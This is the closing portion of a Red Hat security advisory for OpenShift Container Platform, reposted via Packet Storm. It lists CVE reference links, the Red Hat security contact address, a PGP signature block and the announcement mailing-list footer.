https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-1260  
https://access.redhat.com/security/cve/CVE-2023-2253  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/cve/CVE-2023-2700  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-27561  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuYVOAAoJENzjgjWX9erExUgP/2/25PbUv77tHgYG+Oj5rmcT  
oTnu0LnBLOsDXYGOomnrE/UZFvWtQr8lGWpvkHpZjJjg7IZo4vN4mUhK+z7dM+3M  
zuyV++GHDF/zr1XxYf6xWWWNtdCTwWsUKcb6FB4J+WCiUJ8PSYFY3lbPcvAbTamP  
Hj1JHc3/NxYswwfwBcmK+E4DX4y0XImRdu5+vIXZdp5dpTBehchnSa+Mgjt7vdwi  
rHi7CdAsHDrPQhThlIRmc17cwsqiZS760xxpx9UNHvix5UQA9ns+OcUx/dLaGR9E  
dp41kCebze5st+wpBMCPoOZEvHJIMjC6ODFVb4mzRbhbAbWJS6GZl2V783v5RGrr  
FemE7DDKKt6QEjZhT61GXVS9EdWdFrNii5kmgEiUc/F6Md0fHrPcdt5yxK0dhPZb  
3R/64vcMsHllsEStpg8s1aieAZbpmheylEKK+zf82Vz3nlBNX5kxi2IxCrl4nG6X  
KublzGkkKiNXS9rZqzPDRgtGAn5Qi01U9kUzVgdKGfMsyRnvAVDeZf/FUdOhCm7M  
h2Yt9M2cgPImRWatKkECpsAwcHbgGtsFL96/5z6CSOoXbqkB2xV6LVixsoa4ys76  
cHsXRPJFDU97Y1I9h1kJbro/N8UdPZSicVdsWrLYadujBrhaPq5MoW+B1FpayaDh  
+AfFGtVd9LRp5sYROCuT  
=2EuA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm